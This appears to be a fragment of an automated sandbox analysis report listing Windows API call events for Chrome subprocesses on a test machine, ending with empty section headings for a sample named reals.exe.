NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x000001d4 suspend_count: 1 process_identifier: 2876	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 2876	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000280 suspend_count: 1 process_identifier: 2876	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000130 suspend_count: 1 process_identifier: 2448	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 2448	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 2496	1	0
CreateProcessInternalW Feb. 18, 2024, 10:35 a.m.	thread_identifier: 2716 thread_handle: 0x0000000000000098 process_identifier: 1080 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 18, 2024, 10:35 a.m.	thread_identifier: 3160 thread_handle: 0x0000000000000144 process_identifier: 3156 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2988 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 18, 2024, 10:35 a.m.	thread_handle: 0x0000000000000214 suspend_count: 1 process_identifier: 3032	1	0
CreateProcessInternalW Feb. 18, 2024, 10:36 a.m.	thread_identifier: 1764 thread_handle: 0x0000000000000558 process_identifier: 1092 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1068,18386002131428475490,10803167387449053816,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=1E1D777E54CDE3DF3070807EF0AE252A --mojo-platform-channel-handle=1084 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000560	1	1
CreateProcessInternalW Feb. 18, 2024, 10:35 a.m.	thread_identifier: 1852 thread_handle: 0x0000000000000098 process_identifier: 1096 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW Feb. 18, 2024, 10:35 a.m.	thread_identifier: 3264 thread_handle: 0x0000000000000144 process_identifier: 3260 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2476 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread Feb. 18, 2024, 10:35 a.m.	thread_handle: 0x0000000000000210 suspend_count: 1 process_identifier: 2568	1	0
CreateProcessInternalW Feb. 18, 2024, 10:35 a.m.	thread_identifier: 3892 thread_handle: 0x0000000000000518 process_identifier: 3888 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1092,13381370173561356984,5906995998180378764,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=44B60E9A12F60236E80E7639CF7D58AB --mojo-platform-channel-handle=1128 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000051c	1	1
CreateProcessInternalW Feb. 18, 2024, 10:35 a.m.	thread_identifier: 2864 thread_handle: 0x0000000000000098 process_identifier: 800 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1

reals.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All